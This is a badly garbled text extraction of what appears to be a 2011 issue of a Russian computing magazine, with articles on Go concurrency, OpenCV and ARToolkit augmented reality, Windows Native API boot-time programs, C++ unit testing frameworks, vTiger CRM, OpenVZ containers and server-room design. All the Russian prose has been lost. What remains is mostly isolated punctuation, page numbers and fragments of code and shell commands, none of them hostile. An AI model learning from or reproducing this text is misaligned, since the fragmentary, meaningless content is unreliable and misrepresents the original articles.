fmt.Printf("[timer] !\n")
17 }
18 }
19
20 func main() {
21 var str string
22
23 ch := make(chan string)
24 go timer(ch, 1000000000, 10)
25
26 for {
27
fmt.Printf("[main] ...\n")
28
str = <-ch
29
if str == "!" {
30
fmt.Printf("[main] ,
.\n")
31
return
32
} else {
33
fmt.Printf("[main] !\n")
34
}
35 }
36 }
, ,
.
X 04 /147/ 2011
Go , Vim
Go. .
, , C++ Java,
Go ,
.
package,
, . main,
, . ,
, : ,
, ,
.
3 4 time fmt,
.
, C++, , Go,
-,
,
, -,
. !
6 timer()
.
, , , . ,
, ch
.
, , ,
. ns
count int. .
, Go ,
( :
- - ). Go ,
(, , ). ,
( Go ),
() X 04 /147/ 2011
.
, .
count , 7 for,
,
.
timer Sleep
( 8) time. ,
, int64 (
long ), ,
( , ).
, timer ,
, timer .
9 15
.
if, , , for,
. ,
..., !,
..., . Go , ch, chan string,
( Go
, ).
16
! .
, Go
main ( 20 36), . , main,
, timer,
.
, . str string,
var (
nil, NULL ).
make() ( 23),
.
make , new().
103
CODING
, .
ok false . , ok ==
false - ,
.
, :
ok := ch <-
2. Go , ,
. make:
, Go,
chan string , , ,
. ch, := (
,
).
24 timer - . -
go.
, timer , .
Go <-,
:
str = <-ch
,
, .
. 26 35.
Go while, , ,
for (
, ).
str , timer, ,
,
. ,
. ,
( python ruby) len (
).
,
(
UNIX, Plan9 MacOS X). (
Windows), ,
golang.org (, - timer ). .
,
?
, , -
, /
. , Go .
1. .
str = <-ch str, ok = <-ch,
104
, , .
timer
,
.
3. ,
, , .
,
,
,
. ,
:
select {
case str = <-ch1:
//
case str = <-ch2:
//
case str = <-ch3:
//
}
select , . .
select ,
. ,
-
, default select.
select Go, ,
,
.
Inferno ( Go-
Limbo)
.
Go , ,
(
, Squeak,
NewSqueak Limbo). Go , .
, ,
,
. z
X 04 /147/ 2011
CODING
Fagot (salieff@mail.ru)
Augmented reality
,
. ,
.
, .
,
.
,
.
VHS-
.
. X 04 /147/ 2011
, ,
.
, web- GPS- XXI .
QR-,
.
AR Augmented
Reality.
105
CODING
Fagot (salieff@mail.ru)
AR-
AR
.
. , ,
,
(, ). , , AR.
, .
-
,
.
AR
,
.
.
. , , ,
, : , GPS .
, , .
, , , .
, Layar,
AR- .
, .
.
,
,
. ,
. ,
- - ,
106
AR-, , ,
. ,
. , , OpenCV (Open Source Computer Vision
Library
). .
RTL , , . -
,
;
,
;
, GUI .
BSD-. , OpenCV,
Windows, Linux, FreeBSD MacOS X.
OpenCV-
OpenCV. , ( )
.
.
, .
OpenCV
X 04 /147/ 2011
INFO
info
3D- AR-
Augmented Reality
: ,
OpenCV
.
DVD
AR
AR- Layar
cvCreateImage,
cvLoadImage,
cvCloneImage.
, ,
,
cvReleaseImage.
:
IplImage *img_orig = cvLoadImage("image.jpg");
,
,
.
, .
OpenCV . , .
cvNamedWindow("XaKeP OpenCV Window",
CV_WINDOW_AUTOSIZE);
cvShowImage("XaKeP OpenCV Window", img_orig);
cvWaitKey(0);
, .
, .
. - ,
. ,
(
, ) . , ,
, 50%,
, , .
8- , 0-127-255.
:
cvCvtColor(img_orig, img_gray, CV_RGB2GRAY);
cvEqualizeHist(img_gray, img_hist);
X 04 /147/ 2011
,
,
. , ,
.
, ,
, ,
(
), , , , .
, ,
.
CvMemStorage *storage = cvCreateMemStorage(0);
CvSeq *contours = NULL;
cvFindContours(img_thr, storage, &contours);
, .
( 2% ),
, . , ,
.
, :
dvd
,
OpenCV
ARToolkit.
HTTP://WWW
links
OpenCV:
http://goo.gl/Erg2f.
OpenCV:
http://goo.gl/Ls2JM.
ARToolkit: hitl.washington.edu/artoolkit.
Layar:
layar.com.
while (contours) {
CvSeq *result = cvApproxPoly(...
cvContourPerimeter(contours)*0.02 ...);
if (result->total==4 && cvContourArea(result)
>= 100 && cvCheckContourConvexity(result))
{
cvDrawContours(img_orig, result, ...);
() , . , ,
, .
107
CODING
Fagot (salieff@mail.ru)
OpenCV
, , 200200, srcQuad dstQuad :
CvMat *warp_mat = cvCreateMat(3, 3, CV_32FC1);
cvGetPerspectiveTransform(srcQuad, dstQuad, warp_mat);
IplImage* mrk = cvCreateImage(cvSize(200, 200), 8, 1);
cvWarpPerspective(img_thr_bkp, mrk, warp_mat);
,
. , , . . ,
.
,
. ,
.
. , -,
.
, , . ,
,
, .
.
OpenCV .
, , , .
,
. .
,
. , , (
).
,
:
CvHaarClassifierCascade *cascade=(CvHaarClassifierCascade*)
cvLoad("/usr/share/opencv/haarcascades/haarcascade_
frontalface_default.xml");
.
,
, ,
, .
108
,
,
:
CvSeq *faces = cvHaarDetectObjects(img_gray, cascade,
storage);
for (size_t i=0; i<faces->total; ++i) {
CvRect *r = (CvRect*)cvGetSeqElem(faces, i);
cvRectangle(img, cvPoint(r->x, r->y),
cvPoint(r->x + r->width, r->y + r->height));
}
, . , . , , OpenCV . ,
, .
ARToolkit
OpenCV, ,
.
. 1999
, - .
HIT
, ARToolkit.
. ,
.
.
OpenGL,
. ,
,
.
API,
,
,
.
, , ,
, Flash SilverLight.
X 04 /147/ 2011
URL
QR-
ARToolkit,
callback,
, ,
(
ESC), ,
:
ARToolkit
ARToolkit
, , ARToolkit.
Hiro, Kanji, Sample1 Sample2; pdf
patterns. Sample1
, Hiro
, ,
. OpenGL
GLUT, :
glutInit(&argc, argv);
ARToolkit. :
, ,
,
GUI, :
arVideoOpen("");
arVideoInqSize(&frame_width, &frame_height);
arParamLoad("Data/camera_para.dat", 1, ¶m1);
arParamChangeSize(¶m1, frame_width,
frame_height, ¶m2);
arInitCparam(¶m2); // Webcam
argInit(¶m2, 1.0, 0, 0, 0, 0); // GUI
bin/Data ,
.
,
blankPatt.gif
mk_patt, .
mrk1_id = arLoadPatt("Data/patt.sample1");
mrk2_id = arLoadPatt("Data/patt.hiro");
X 04 /147/ 2011
mainFunc .
.
,
:
ARUint8 *frame = (ARUint8 *)arVideoGetImage();
argDispImage(frame, 0, 0);
arDetectMarker(frame, 100, &mrk_info, &mrk_count);
for (int i=0; i<mrk_count; ++i)
if (mrk1_id==mrk_info[i].id) index=i;
. OpenGL.
,
,
.
:
arGetTransMat(&mrk_info[index], mrk1_center,
rk1_width, mrk1_trans);
argConvGlpara(mrk1_trans, gl_para);
glMatrixMode(GL_MODELVIEW);
glLoadMatrixd(gl_para);
glutSolidCube(50.0);
109
CODING
(hex.pp.ua)
Native API
,
Windows,
, .
Windows,
Win32, .
110
ZenWinX,
NCLI TinyKRNL
. ZenWinX
, ,
, ,
, NCLI, . , NCLI
Shift. , NCLI,
, . ,
Native Shell.
, ,
native-, ,
X 04 /147/ 2011
DVD
dvd
Native Shell 0.12
native- HKEY_LOCAL_MACHINE\CurrentControlSet\Control\Session Manager.
,
. ,
BootExecute. ,
autocheck autochk *.
. , native.exe %systemroot%\system32, BootExecute native.
native.exe autochk.exe
. ,
native some-command.
,
NT-,
(, C:\tmp\native.exe).
native- autocheck
( autochk )
async debug. debug
ProcessParameters -> DebugFlags = TRUE.
async ,
, ,
. ,
,
SYSTEM.
, ,
SetupExecute BootExecute.
,
.
SetupExecute
, BootExecute
.
WWW
. ,
, : undocumented.
ntinternals.net.
MSDN. ntdll.dll
Microsoft Developers Network Windows Driver Kit: msdn.
microsoft.com.
Native Shell. native- :
hex.pp.ua/nt-native-applications-shell.php.
ReactOS Windows.
Native API ,
: svn.reactos.org/svn/reactos.
ZenWinX, native: zenwinx.sourceforge.net.
Native Development Kit (NDK) .
, Native API:
code.google.com/p/native-nt-toolkit.
,
, .
Native API ,
API . WinAPI - - ,
Native API, , -. ,
WinAPI ntdll.dll.
111
CODING
Windows XP
,
, native-. TARGETTYPE
PROGRAM, , UMTYPE nt , ,
native.
build,
Build Environment WDK.
NDK (Native NT Toolkit), WDK ,
Native API. ndk
, WDK,
bin/setenv.bat ( include=).
.exe- .
, .
PE- exe- , , . native-
0x01, , .exe
.
, Windows GUI (0x02)
Windows console (0x03). -
Native-
Windows. Windows Win32.
BootExecute.
, -, , -, . BootExecute
,
Windows.
, ,
.
,
, ,
,
. ,
-
.
NtCreateFile .
\Device\KeyboardClass0.
HANDLE hDriver;
UNICODE_STRING Driver;
112
Windows
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK Iosb;
RtlInitUnicodeString(&Driver, L"\\Device\\KeyboardClass0");
InitializeObjectAttributes(&ObjectAttributes, &Driver,
OBJ_CASE_INSENSITIVE, NULL, NULL);
NtCreateFile(&hDriver, SYNCHRONIZE | GENERIC_READ |
FILE_READ_ATTRIBUTES,
&ObjectAttributes, &Iosb, NULL, FILE_ATTRIBUTE_NORMAL,
0, FILE_OPEN, FILE_DIRECTORY_FILE, NULL, 0);
( Event),
.
InitializeObjectAttributes(&ObjectAttributes,
NULL, 0, NULL, NULL);
NtCreateEvent(&hEvent, EVENT_ALL_ACCESS,
&ObjectAttributes, 1, 0);
NtReadFile,
.
IO_STATUS_BLOCK Iosb;
LARGE_INTEGER ByteOffset = 0;
NTSTATUS Status;
RtlZeroMemory(&Iosb, sizeof(Iosb));
Status = NtReadFile(hDriver, hEvent, NULL, NULL, &Iosb,
Buffer, *BufferSize, &ByteOffset, NULL);
NtWaitForSingleObject.
if (Status == STATUS_PENDING)
{
Status = NtWaitForSingleObject(hEvent, TRUE, NULL);
}
NtReadFile KEYBOARD_INPUT_DATA.
:
typedef struct _KEYBOARD_INPUT_DATA {
USHORT UnitId;
USHORT MakeCode;
USHORT Flags;
USHORT Reserved;
ULONG ExtraInformation;
} KEYBOARD_INPUT_DATA, *PKEYBOARD_INPUT_DATA;
X 04 /147/ 2011
native-
BootExecute
MakeCode , Flags
,
Shift, Ctrl - . ,
,
.
getch. , . ,
,
, Windows
. Native-
NtTerminateProcess(NtCurrentProcess(), 0);
, UNICODE_STRING -
NtDisplayString:
UNICODE_STRING unic;
RtlInitUnicodeString(&unic, L"Hello, world!\n");
NtDisplayString(&unic);
\r \n.
,
. native-
.
, ,
, . , ,
.
:
NTSYSAPI ULONG NTAPI RtlGetCurrentDirectory_U(
ULONG MaximumLength,
PWSTR Buffer
);
NTSYSAPI NTSTATUS NTAPI RtlSetCurrentDirectory_U(
X 04 /147/ 2011
SYSTEM
IN PUNICODE_STRING name
);
NT- .
\??\. ,
C:\boot.ini \??\C:\boot.ini.
Native API
DOS-. DOS NT
:
NTSYSAPI BOOLEAN NTAPI RtlDosPathNameToNtPathName_U(
IN PCWSTR DosPathName,
OUT PUNICODE_STRING NtPathName,
OUT PCWSTR *NtFileNamePart,
OUT CURDIR *DirectoryInfo
);
DOS-.
, .
NT
.
. ,
. ,
NtCreateFile FILE_LIST_DIRECTORY
FILE_DIRECTORY_FILE. NtQueryDirectoryFile,
FileBothDirectoryInformation FILE_
BOTH_DIR_INFORMATION.
: , ,
.
typedef struct _FILE_BOTH_DIR_INFORMATION
{
113
CODING
.
FileInformation FILE_RENAME_INFORMATION.
typedef struct _FILE_RENAME_INFORMATION
{
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
NtQueryDirectoryFile
ReturnSingleEntry = TRUE,
FILE_BOTH_DIR_
INFORMATION, ,
. FALSE
,
. , , NextEntryOffset.
NULL.
,
, , MSDN.
NtReadFile, NtWriteFile, NtDeleteFile ,
WinAPI.
,
.
, .
NtSetInformationFile, .
. :
NTSYSCALLAPI NTSTATUS NTAPI NtSetInformationFile(
IN HANDLE FileHandle,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
FileInformationClass
FileRenameInformation, -
114
FILE_RENAME_INFORMATION , .
. ,
NewFileName FileNameSize.
PFILE_RENAME_INFORMATION FileRenameInfo;
FileRenameInfo = RtlAllocateHeap(RtlGetProcessHeap(),
HEAP_ZERO_MEMORY,
sizeof(FILE_RENAME_INFORMATION) + FileNameSize);
NewFileName
FileName .
ReplaceIfExists , ,
. RootDirectory
, .
NULL,
FileName
NT-.
, , FileName
.
:
Status = NtSetInformationFile(
FileHandle,
&IoStatusBlock,
FileRenameInfo,
sizeof(FILE_RENAME_INFORMATION)+ FileNameSize,
FileRenameInformation
);
FileRenameInfo sizeof(FILE_
RENAME_INFORMATION),
FileName.
Length , FileName.
MSDN
, -Key, ,
NtQueryValueKey.
Native API , Win32.
HKEY_XXX
\REGISTRY \USER \
MACHINE. HKEY_USERS HKEY_
LOCAL_MACHINE. HKEY_CURRENT_USER ,
\USER. HKEY_
CLASSES_ROOT , \USER, \MACHINE.
WinAPI , ,
HANDLE, HKEY.
2006
NtRegEdit
X 04 /147/ 2011
KeyValueBasicInformation, KEY_
VALUE_BASIC_INFORMATION.
pbi = (PKEY_VALUE_BASIC_INFORMATION)buf;
while (STATUS_SUCCESS == NtEnumerateValueKey(hKey, i++,
KeyValueBasicInformation, pbi, BUFFER_SIZE, &ResultLength))
{
;
}
TinyKRNL
(regedit.exe). NtRegEdit
Native API,
native-.
ZenWinX , . , winx_register_boot_exec_command
, , , ,
BootExecute.
ntreg rodream
ntreg.c ntreg.h,
. , , ,
.
, - ,
NtEnumerateKey.
NTSYSCALLAPI NTSTATUS NTAPI NtEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength
);
KEY_
NODE_INFORMATION. KeyInformationClass
KeyNodeInformation, KeyInformation
.
:
ULONG ResultLength, i = 0;
char buf[BUFFER_SIZE];
PKEY_NODE_INFORMATION pki = (PKEY_NODE_INFORMATION)buf;
while (STATUS_SUCCESS == NtEnumerateKey(hKey, i++,
KeyNodeInformation, pki, BUFFER_SIZE, &ResultLength))
{
;
}
WCHAR pki->Name,
- . , ,
NtEnumerateValueKey
X 04 /147/ 2011
.
,
,
, .
native-
. native-, , .
Win32-, Win32
CSRSS (
). Windows
, ,
autochk.exe, autofmt.exe ( Win32- chkdsk.exe
format.exe ), srdelayed.exe
( ).
native- , RtlCreateUserProcess.
RTL_USER_PROCESS_
PARAMETERS,
RtlCreateProcessParameters.
NT-, .
RTL_USER_PROCESS_INFORMATION. NtResumeThread,
.
.
, , .
, .
. ,
ProcessHandle RTL_USER_PROCESS_INFORMATION
NtWaitForSingleObject,
.
autochk.exe , .
RtlCreateUserProcess :
: autochk.exe
: autochk.exe /p \??\C:
: \??\C:\windows\system32\autochk.exe
Native-
.
native-
. ,
Native API,
. z
115
CODING
deeonis (deeonis@gmail.com)
Unit
C++
. , , .
,
. , , .
-?
. ,
-
,
.
, ,
.
, ,
80% ,
.
, unit- ,
, . , . . ,
. - ,
. ,
, unit-test
, . ,
.
unit-
. , . , , ( ,
- ,
).
,
, ,
.
- . , /,
. ,
. .
116
. , , . , ,
, ,
, .
, - , SVN.
.
. , , , ,
. ,
.
unit-.
, . C++, -.
CppUnit
, unit-test C++.
JUnit
Java. , CppUnit
, ,
.
. TestCase,
.
TestCase, runTest(),
.
CppUnit::TestCase
class ComplexNumberTest : public CppUnit::TestCase
{
public:
ComplexNumberTest( std::string name ) :
CppUnit::TestCase( name )
{
}
void runTest()
{
CPPUNIT_ASSERT( Complex (10, 1) == Complex (10, 1) );
X 04 /147/ 2011
CppUnit
,
, TestFixture TestCaller.
TestFixture ,
. - setUp(). ,
(, ), tearDown(), .
. ,
.
CppUnit::TestFixture
class Complex
{
friend bool operator ==(const Complex& a, const Complex& b);
double real, imaginary;
public:
Complex( double r, double i = 0 )
: real(r),
imaginary(i)
{
}
};
bool operator ==( const Complex &a, const Complex &b )
{
return a.real == b.real && a.imaginary == b.imaginary;
}
class ComplexNumberTest :
public CppUnit::TestFixture
{
private:
Complex *m_10_1, *m_1_1, *m_11_2;
public:
X 04 /147/ 2011
void tearDown()
{
delete m_10_1;
delete m_1_1;
delete m_11_2;
}
};
,
TestCaller. , , TestFixture. TestCaller ,
, , . :
CppUnit::TestCaller
class ComplexNumberTest :
public CppUnit::TestFixture
{
...
public:
...
void testEquality()
{
CPPUNIT_ASSERT( *m_10_1 == *m_10_1 );
CPPUNIT_ASSERT( !(*m_10_1 == *m_11_2) );
}
void testAddition()
{
CPPUNIT_ASSERT( *m_10_1 + *m_1_1 == *m_11_2 );
}
};
CppUnit::TestCaller<ComplexNumberTest> test(
"testEquality", &ComplexNumberTest::testEquality
);
CppUnit::TestResult result;
test.run( &result );
117
CODING
Wikipedia
, , CppUnit Test
Case. Test Case . -,
, , -,
TestCaller . -
Suite CppUnit::TestSuite.
addTest,
TestCaller.
CppUnit::TestSuite *suiteOfTests =
new CppUnit::TestSuite( "ComplexNumberTest" );
suiteOfTests->addTest(
new CppUnit::TestCaller<ComplexNumberTest>(
"testEquality",
&ComplexNumberTest::testEquality ) );
suiteOfTests->addTest(
new CppUnit::TestCaller<ComplexNumberTest>(
"testAddition",
&ComplexNumberTest::testAddition ) );
CppUnit::TestSuite
CppUnit::TestSuite suite;
CppUnit::TestResult result;
suite.addTest( new CppUnit::TestCaller<ComplexNumberTest>(
"testEquality",
&ComplexNumberTest::testEquality ) );
suite.addTest( new CppUnit::TestCaller<ComplexNumberTest>(
"testAddition",
&ComplexNumberTest::testAddition ) );
suite.run( &result );
, (Test Suite)
TestRunner. addTest
. , suite, TestSuite.
CppUnit::TestRunner
class ComplexNumberTest :
public CppUnit::TestFixture {
...
public:
static CppUnit::Test *suite()
{
118
return suiteOfTests;
}
...
};
int main( int argc, char **argv)
{
CppUnit::TextUi::TestRunner runner;
runner.addTest( ExampleTestCase::suite() );
runner.addTest( ComplexNumberTest::suite() );
runner.run();
return 0;
}
.
,
. ,
, .
Google C++ Testing Framework.
X 04 /147/ 2011
BSD- 2008 ,
.
Google Test ( )
xUnit, CppUnit. ,
, ,
, .
CppUnit, .
, ASSERT_TRUE EXPECT_GE. .
ASSERT_xxx , ( ) EXPECT_xxx
, .
TEST. ,
. , ,
. :
TEST()
int Factorial(int n); // n
// 0.
TEST(FactorialTest, HandlesZeroInput)
{
EXPECT_EQ(1, Factorial(0));
}
// .
TEST(FactorialTest, HandlesPositiveInput)
{
EXPECT_EQ(1, Factorial(1));
EXPECT_EQ(2, Factorial(2));
EXPECT_EQ(6, Factorial(3));
EXPECT_EQ(40320, Factorial(8));
}
q1_.Enqueue(1);
q2_.Enqueue(2);
q2_.Enqueue(3);
}
// virtual void TearDown() {}
Queue<int> q0_;
Queue<int> q1_;
Queue<int> q2_;
};
// NULL,
E* Dequeue();
size_t size() const;
...
};
main,
.
gtest_main.
//
class QueueTest :
public ::testing::Test
{
protected:
virtual void SetUp()
{
X 04 /147/ 2011
119
SYN/ACK
grinder (grinder@tux.in.ua)
CRM
, -,
, ,
CRM. , CRM , , , , .
.
CRM?
(CRM,
Customer Relationship Management System)
, (, ; , ;
). , , ,
(
, ).
, CRM ,
, , .
-,
,
.
. , ,
. , ,
,
.
, ,
, CRM-,
. , ,
, (, ).
. CRM , ,
, , , ,
,
VoIP, .
CRM , -
, .
. , CRM ,
(
),
.
120
. , , CRM
,
. ,
- ,
.
,
.
, CRM .
CRM :
, .
,
, .
,
. .
CRM
, ,
. , ,
.
CRM
, ,
, , , , ,
.
. ,
CRM . ,
, , .
, .
, ,
.
. , ,
, CRM
, IT.
X 04 /147/ 2011
,
,
, , (,
,
CRM).
-
,
.
, .
:
, ,
,
. , CRM, SFA (Sales Force Automation System Sales force
X 04 /147/ 2011
vTiger CRM.
Ubuntu ( /var/
www/vtigercrm):
$ sudo apt-get install php5-gd php5-imap
$ sudo chown www-data:www-data /var/www/
vtigercrm
MySQL, vTiger CRM
. .
. ,
Setting Module Manager Custom Modules
Import New.
install.php
install.
vTiger CRM ,
OpenSource .
,
bin-.
INFO
info
10% CRM
.
CRM
,
.
management systems). , ,
CRM , . SFA
.
CRM , 1, Excel . ,
CRM. -,
? , , .
,
CRM,
121
SYN/ACK
vTiger CRM
Configuration
Wizard
. , .
,
CRM .
CRM
vTiger CRM ,
. , , , .
, Outlook, (
CRM Outlook) . MS Word (
).
,
CMS .
,
, ,
.
, , ,
, ,
.
(
, )
.
, , (
) . , ,
- (
, ).
. ,
CRM,
122
CRM-
. ,
, .
CRM ,
, , .
, CRM
.
- .
.
CRM .
,
, .
, .
,
, .
, (
CRM), OpenSource
Linux/*BSD, MySQL.
CRM,
(SaaS). , NetSuite CRM (netsuite.com) (megaplan.ru,
SaaS ).
SaaS , ,
, .
. ,
, ,
. ,
, , .
vTiger CRM
, SynAsk
, ,
,
.
,
:
, .
,
.
. .
/
-,
, , ,
,
,
1997
. ,
, .
, ,
: N ,
, A, B,
C!
: Excel,
, .
?
:
N ,
, ,
()
(
) - !. ,
- ,
.
. ,
.
(
) .
.
.
,
,
, .
,
,
() , ,
,
,
. ,
.
. ,
( Web Forms).
Customer Portal
. SFA , ,
, , (
MS Excel OO Calc ), , , .
( CRM
PDF), .
,
( 5.2.1).
,
. ,
, , ,
, .
.
, , ,
.
.
,
, vTiger CRM
,
.
, , ,
.
, , , .
:
.
.
SugarCRM (sugarcrm.com),
.
vTiger CRM , SugarCRM. ,
, , , ,
.
CRM,
- .
,
-.
X 04 /147/ 2011
vTiger CRM
123
SYN/ACK
(
SMTP/IMAP , GMail), , RSS-.
VoIP- Asterisk. Outlook, MS Word ( 2000/2003/2007), Thunderbird Firefox.
iPhone
Android. .
vTiger CRM
LAMP/WAMP,
-. .
Linux - (
bin), .
,
vTiger CRM, : CPU 1.8 512
RAM ( 2).
, ,
.
vTiger CRM .
, ,
. ,
, , ,
,
.
124
vTiger CRM
CRM ,
. , .
, ,
. z
X 04 /147/ 2011
SYN/ACK
(zobnin@gmail.com)
-
OpenVZ
,
. , ,
. , - ,
web-.
,
,
. : -,
,
, , , - .
,
,
, ,
,
.
, ,
.
, ,
,
.
GNU/Linux.
: ,
,
,
, , , ,
( ).
, , :
, , . ,
, ,
- , ,
, .
, ,
,
.
, , , ,
126
. ,
,
,
.
: ,
( 1%) .
:
.
OpenVZ?
UNIX .
FreeBSD.
Jail () ,
.
, Sun
Solaris 10, Solaris Zones,
, (,
Solaris Zones ).
Linux,
. -, Linux-VServer (
). -, , LXC (LinuX Containers),
, ,
Linux,
-
. -,
OpenVZ,
Virtuozzo,
Parallels.
OpenVZ Virtuozzo -
C Linux.
,
Linux. ,
OpenVZ ,
OpenVZ, ,
.
X 04 /147/ 2011
OpenVZ .
,
, ,
. ,
DNS- vzctl
/etc/resolv.conf .
.
OpenVZ?
, OpenVZ Linux,
,
VE (Virtual Environment
),
.
.
,
, Hardware Node ( ). -,
.
Linux-.
,
, , , ( )
,
.
OpenVZ
, , , .
, ,
X 04 /147/ 2011
OpenVZ-
vzlist
;
vzmigrate offline- online-;
vzcfgvalidate
;
vzmemcheck, vzcpucheck, vzcalc
;
vzsplit
;
vzpid PID
;
vzquota .
.
OpenVZ
(venet veth)
,
, ,
IP-,
. OpenVZ ,
. ,
.
, ,
(,
web- , 5 ).
OpenVZ .
,
- .
INFO
info
/var/lib/vz/private,
,
.
:
tar -C /var/lib/vz/
private/100 -czf /
var/lib/vz/template/
cache/debian-5.0custom-x86_64.tar.gz
127
SYN/ACK
,
, / .
OpenVZ
, (
).
, -, OpenVZ
.
,
, , (,
memcached ).
128
Virtuozzo, OpenVZ RHEL,
OpenVZ- .
OpenVZ Debian,
OpenVZ (
linux-openvz-i386 FIXME).
Ubuntu OpenVZ 8.10, OpenVZ :
Ubuntu 8.04. , , : -, OpenVZ- 2.6.18, Ubuntu
8.04 2.6.24; -,
Ubuntu 8.04 LTS-, ,
2013 , , , . ,
RHEL, OpenVZ .
openvz.org yum:
# cd /etc/yum.repos.d
# wget http://download.openvz.org/openvz.repo
# rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ
SELinux:
X 04 /147/ 2011
.
OpenVZ userspace-, :
OpenVZ
:
# yum install ovzkernel
# yum install vzctl vzquota
Debian ,
:
$ sudo apt-get install vzctl vzquota \
linux-openvz-i386
# /etc/init.d/vz start
,
OpenVZ ,
, , , .
OpenVZ, ,
( ).
:
1. ,
,
( ).
2. Linux
, , initramfs .
3. OpenVZ.
.
- :
$ cd /var/lib/vz/template/cache
wget:
OpenVZ-
:
$ sudo apt-get update
$ sudo apt-get install vzctl vzquota
linux-openvz
, OpenVZ
.
/etc/sysctl.conf :
# vi /etc/sysctl.conf
net.ipv4.conf.default.proxy_arp = 1
net.ipv4.ip_forward = 1
net.ipv4.conf.all.rp_filter = 1
kernel.sysrq = 1
net.ipv4.conf.default.send_redirects = 1
net.ipv4.conf.all.send_redirects = 0
X 04 /147/ 2011
, download.openvz.org/template/
precreated .
OpenVZ ,
vzctl. , , ,
, .
OpenVZ
. :
# vzctl _
,
OpenVZ, .
create,
set,
HTTP://WWW
links
,
UBC:
wiki.openvz.org/UBC;
:
http://goo.gl/h1gNL.
, :
http://goo.gl/lZbzW.
:
http://goo.gl/sYtxF;
I/O
:
http://goo.gl/YtjiV.
C
OpenVZ:
http://goo.gl/KfEbB.
OpenVZ Web Panel,
web-
OpenVZ:
http://goo.gl/x7UlF.
OpenVZ
Web Panel:
http://goo.gl/vx73u.
OpenVZ
Ubuntu 10.04
:
http://goo.gl/XEaou.
129
SYN/ACK
debian-5.0-x86
tar.gz, vps.basic ,
.
2. , :
# vzctl set 100 --onboot yes --save
3. :
# vzctl set 100 --hostname my-first-vps.org.ru --save
OpenVZ
10.
( , ):
# vzctl enter 100
man- vzctl.
UBC
OpenVZ User
Beancounters (UBC). 20 UBC, . UBC
vzctl, /proc/user_
beancounters, . ,
, :
4. IP-:
# vzctl set 100 --ipdel all --ipadd 192.168.0.100 --save
5. DNS-:
# vzctl set 100 --nameserver 192.168.0.1 --save
6. root:
# vzctl set 100 --userpasswd root:password --save
7. 15% (
100%, 200%, 400% ):
# vzctl set 100 --cpulimit 15 --save
8. 20 25 :
# vzctl set 100 --diskspace 20G:25G --save
9. ( , , ,
):
130
/proc/user_beancounters
uid ;
resource ;
held ;
maxheld
;
barrier ,
;
limit ,
;
failcnt , ,
.
OpenVZ, . failcnt ,
,
,
.
, ,
, . z
X 04 /147/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,
500 .
12 2200 .
6 1260 .
,
!
+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
SYN/ACK
(dhsilabs@mail.ru, dkws.org.ua)
, , .
, ,
/
(, , ,
][ , :) . .). ,
, , ,
. ,
, , . ,
, (
). , . ,
.
.
.
, . ()
, , ,
( ,
); ,
. , .
.
, .
, ,
, ,
. , .
.
, .
, , , .
. , ,
,
.
- . ,
, . , .
. , . :
,
( ),
132
, , .
( ).
:
, , . (, ),
(, ).
,
( , ).
. (Automatic Call Distribution),
(Key Telephone System), .
. ,
,
(
).
( )
TIA-569, .
1. . ,
34.
. .
.
, , .
2.
12 , 4.4 .
3.
. . ,
, .
4. . , .
5. 12 . , .
. 12 .
, .
().
6. 2.44 .
7.
18-24 30-55%.
. , , , .
:
X 04 /147/ 2011
TIA-569: dkws.org.ua/files/tia-569.doc;
(
): rackpro.ru;
: ./article04.html;
: axis.com/ru/products/index.htm;
EER: en.wikipedia.org/wiki/Energy_efficiency_ratio;
: dkws.org.ua/
phpbb2/topic4970.html.
, .
TIA-569 :
1. .
2.
(
, ) 3.
3. .
4. : 2 000 ,
910 . ( ),
.
5. 540 1
.
6. .
7. .
,
, :
1. ( )
500 . 3.0 2.2 , 800 .
3.0 2.8 , 1 000 . 3.0 3.4 .
1 000 . ,
.
2.
.
3.
.
X 04 /147/ 2011
, (
) . . ,
, ,
, .
,
. 19 ( 482,6 )
, 10 23 .
600, 800 900 , .
( Rackmount). ,
17,75 (450,85 ), (Unit, ).
.
MiniTower (, ) , .
, ?
, (
).
1.75 (444,5 ),
. , ,
, ,
42U .
42 1U. , 1U 444 , 437
.
. ,
, ,
. ,
-. (, ), . ,
. 1
133
SYN/ACK
. 3. . $120
. 1.
. 2.
-: ,
.
, .
2 .
, : ,
,
.
. ,
. 20U, ,
, 600 900 $270 $400 . ,
. 12U
( , ) $230. $19 ( 1 ) $120
. 6U $130.
( ) 22U
$900, $1500.
,
. 1500 550
1600 $5000.
, , .
, ,
,
, .
( ).
, . ,
.
,
, ,
,
, . ,
, . ,
,
134
. 6.
, Mustek PowerMust
1000 offline
(Line-Interactive UPS)
- (Off-Line UPS).
,
. 5. APC Smart-UPS - . , RT 5000VA,
,
(On-Line UPS, , APC Smart-UPS RT
5000VA).
? , , .
, . , - ,
, .
, ,
: ./article04.html.
20
. , ,
, .
.
, .
. ,
, .
(
), BTU (British thermal unit). 1 3.412
/. , , 400 .
:
10 x 400 x 3.412 = 13 648 /
.
100 , :
5 x 100 x 3.412 = 1 706 /
300 /. , 600-900 /.
, . ,
X 04 /147/ 2011
, ,
. , ,
.
.
,
(
EER), : en.wikipedia.org/wiki/
Energy_efficiency_ratio.
,
-,
, , .
, , (
,
).
30-55% ( 40-50%). , . ,
,
. ( ).
, (
2 000 ). , . ,
.
, .
:
.
, ,
.
, . ,
.
. ,
,
. Axis: axis.com/ru/products
( ,
).
? ,
AVTech KPD-670Z, (
), 1
.
.
, .
. ( ), , .
, (
,
, , ).
, . TIA (
), . z
135
UNITS
Oriyana (oriyana@xpsycho.ru)
PSYCHO:
. - .
? ,
. - , ,
, :
?
,
, -
, . ,
. Wikipedia,
, .
, .,
,
, .
, ,
, , , ,
- . ,
, . ,
, , ,
